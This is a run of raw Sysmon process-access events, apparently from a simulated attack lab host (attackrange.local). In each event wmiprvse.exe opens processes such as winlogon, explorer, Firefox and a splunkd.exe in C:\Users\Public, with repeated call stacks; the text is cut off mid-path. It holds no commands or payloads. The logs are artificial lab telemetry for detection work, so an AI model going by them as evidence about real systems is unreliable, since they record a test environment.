Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149435Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149434Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149433Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149432Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149431Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149430Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149429Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149428Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149427Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149426Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149425Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149424Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149423Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149422Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149421Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149420Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.351{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149419Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.351{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149418Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149417Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149416Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149415Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149414Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149413Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.349{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149412Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.349{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0